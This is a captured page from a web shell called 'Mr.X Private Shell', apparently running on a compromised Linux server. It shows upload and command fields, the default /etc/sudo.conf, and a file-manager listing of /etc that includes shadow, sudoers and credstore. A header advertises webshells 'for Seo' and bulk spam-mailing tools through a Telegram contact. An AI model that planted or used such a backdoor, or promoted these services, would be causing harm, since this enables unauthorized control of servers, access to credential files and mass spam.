__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
#
# Default /etc/sudo.conf file
#
# Sudo plugins:
#   Plugin plugin_name plugin_path plugin_options ...
#
# The plugin_path is relative to /usr/libexec/sudo unless
#   fully qualified.
# The plugin_name corresponds to a global symbol in the plugin
#   that contains the plugin interface structure.
# The plugin_options are optional.
#
# The sudoers plugin is used by default if no Plugin lines are present.
#Plugin sudoers_policy sudoers.so
#Plugin sudoers_io sudoers.so
#Plugin sudoers_audit sudoers.so

#
# Sudo askpass:
#   Path askpass /path/to/askpass
#
# An askpass helper program may be specified to provide a graphical
# password prompt for "sudo -A" support.  Sudo does not ship with its
# own askpass program but can use the OpenSSH askpass.
#
# Use the OpenSSH askpass
#Path askpass /usr/X11R6/bin/ssh-askpass
#
# Use the Gnome OpenSSH askpass
#Path askpass /usr/libexec/openssh/gnome-ssh-askpass

#
# Sudo device search path:
#   Path devsearch /dev/path1:/dev/path2:/dev
#
# A colon-separated list of paths to check when searching for a user's
# terminal device.
#
#Path devsearch /dev/pts:/dev/vt:/dev/term:/dev/zcons:/dev/pty:/dev

#
# Sudo command interception:
#   Path intercept /path/to/sudo_intercept.so
#
# Path to a shared library containing replacements for the execv(),
# execve() and fexecve() library functions that perform a policy check
# to verify the command is allowed and simply return an error if not.
# This is used to implement the "intercept" functionality on systems that
# support LD_PRELOAD or its equivalent.
#
# The compiled-in value is usually sufficient and should only be changed
# if you rename or move the sudo_intercept.so file.
#
#Path intercept /usr/libexec/sudo/sudo_intercept.so

#
# Sudo noexec:
#   Path noexec /path/to/sudo_noexec.so
#
# Path to a shared library containing replacements for the execv(),
# execve() and fexecve() library functions that just return an error.
# This is used to implement the "noexec" functionality on systems that
# support LD_PRELOAD or its equivalent.
#
# The compiled-in value is usually sufficient and should only be changed
# if you rename or move the sudo_noexec.so file.
#
#Path noexec /usr/libexec/sudo/sudo_noexec.so

#
# Sudo plugin directory:
#   Path plugin_dir /path/to/plugins
#
# The default directory to use when searching for plugins that are
# specified without a fully qualified path name.
#
#Path plugin_dir /usr/libexec/sudo

#
# Core dumps:
#   Set disable_coredump true|false
#
# By default, sudo disables core dumps while it is executing (they
# are re-enabled for the command that is run).
# To aid in debugging sudo problems, you may wish to enable core
# dumps by setting "disable_coredump" to false.
#
#Set disable_coredump false

#
# User groups:
#   Set group_source static|dynamic|adaptive
#
# Sudo passes the user's group list to the policy plugin.
# If the user is a member of the maximum number of groups (usually 16),
# sudo will query the group database directly to be sure to include
# the full list of groups.
#
# On some systems, this can be expensive so the behavior is configurable.
# The "group_source" setting has three possible values:
#   static   - use the user's list of groups returned by the kernel.
#   dynamic  - query the group database to find the list of groups.
#   adaptive - if user is in less than the maximum number of groups.
#	       use the kernel list, else query the group database.
#
#Set group_source static

#
# Sudo interface probing:
#   Set probe_interfaces true|false
#
# By default, sudo will probe the system's network interfaces and
# pass the IP address of each enabled interface to the policy plugin.
# On systems with a large number of virtual interfaces this may take
# a noticeable amount of time.
#
#Set probe_interfaces false

#
# Sudo debug files:
#   Debug program /path/to/debug_log subsystem@priority[,subsyste@priority]
#
# Sudo and related programs support logging debug information to a file.
# The program is typically sudo, sudoers.so, sudoreplay, or visudo.
#
# Subsystems vary based on the program; "all" matches all subsystems.
# Priority may be crit, err, warn, notice, diag, info, trace, or debug.
# Multiple subsystem@priority may be specified, separated by a comma.
#
#Debug sudo /var/log/sudo_debug all@debug
#Debug sudoers.so /var/log/sudoers_debug all@debug

Filemanager

Name Type Size Permission Actions
X11 Folder 0755
apparmor Folder 0755
apparmor.d Folder 0755
ca-certificates Folder 0755
cloud Folder 0755
credstore Folder 0700
credstore.encrypted Folder 0700
cron.d Folder 0755
dbus-1 Folder 0755
default Folder 0755
depmod.d Folder 0755
dhcp Folder 0755
eac Folder 0755
fonts Folder 0755
gnutls Folder 0755
gss Folder 0755
ifplugd Folder 0755
init.d Folder 0755
iproute2 Folder 0755
ld.so.conf.d Folder 0755
libnl-3 Folder 0755
logcheck Folder 0755
logrotate.d Folder 0755
modprobe.d Folder 0755
modules-load.d Folder 0755
motd.d Folder 0755
netplan Folder 0755
network Folder 0755
pam.d Folder 0755
plymouth Folder 0755
polkit-1 Folder 0755
profile.d Folder 0755
python3.12 Folder 0755
rsyslog.d Folder 0755
security Folder 0755
sgml Folder 0755
skel Folder 0755
ssh Folder 0755
ssl Folder 0755
sudoers.d Folder 0755
sysctl.d Folder 0755
system-image Folder 0755
systemd Folder 0755
udev Folder 0755
ufw Folder 0755
update-motd.d Folder 0755
vim Folder 0755
wpa_supplicant Folder 0755
writable Folder 0755
xdg Folder 0755
xml Folder 0755
.pwd.lock File 0 B 0600
.resolv.conf.systemd-resolved.bak File 862 B 0644
bash.bashrc File 2.26 KB 0644
bash_completion File 45 B 0644
bindresvport.blacklist File 367 B 0644
ca-certificates.conf File 6.14 KB 0644
crypttab File 54 B 0644
dhcpcd.conf File 1.4 KB 0644
e2scrub.conf File 685 B 0644
environment File 106 B 0644
ethertypes File 1.81 KB 0644
fstab File 37 B 0644
group File 768 B 0644
gshadow File 638 B 0640
host.conf File 92 B 0644
hostname File 1 B 0644
hosts File 159 B 0644
hosts.allow File 411 B 0644
hosts.deny File 711 B 0644
inputrc File 1.83 KB 0644
issue File 26 B 0644
issue.dpkg-old File 27 B 0644
issue.net File 19 B 0644
issue.net.dpkg-old File 16 B 0644
ld.so.cache File 10.66 KB 0644
ld.so.conf File 34 B 0644
legal File 267 B 0644
libaudit.conf File 191 B 0644
locale.conf File 13 B 0644
localtime File 114 B 0644
login.defs File 12.08 KB 0644
lsb-release File 104 B 0644
machine-id File 0 B 0644
magic File 111 B 0644
magic.mime File 111 B 0644
mime.types File 73.35 KB 0644
mke2fs.conf File 744 B 0644
modules File 212 B 0644
File 0 B 0
netconfig File 767 B 0644
nsswitch.conf File 559 B 0644
os-release File 177 B 0644
passwd File 1.58 KB 0644
profile File 582 B 0644
protocols File 3.07 KB 0644
resolv.conf File 1 B 0644
rpc File 911 B 0644
services File 12.51 KB 0644
shadow File 872 B 0640
shells File 118 B 0644
subgid File 0 B 0644
subuid File 0 B 0644
sudo.conf File 4.24 KB 0644
sudo_logsrvd.conf File 9.57 KB 0644
sudoers File 1.76 KB 0440
ucf.conf File 1.23 KB 0644
vconsole.conf File 10 B 0644
xattr.conf File 681 B 0644
Filemanager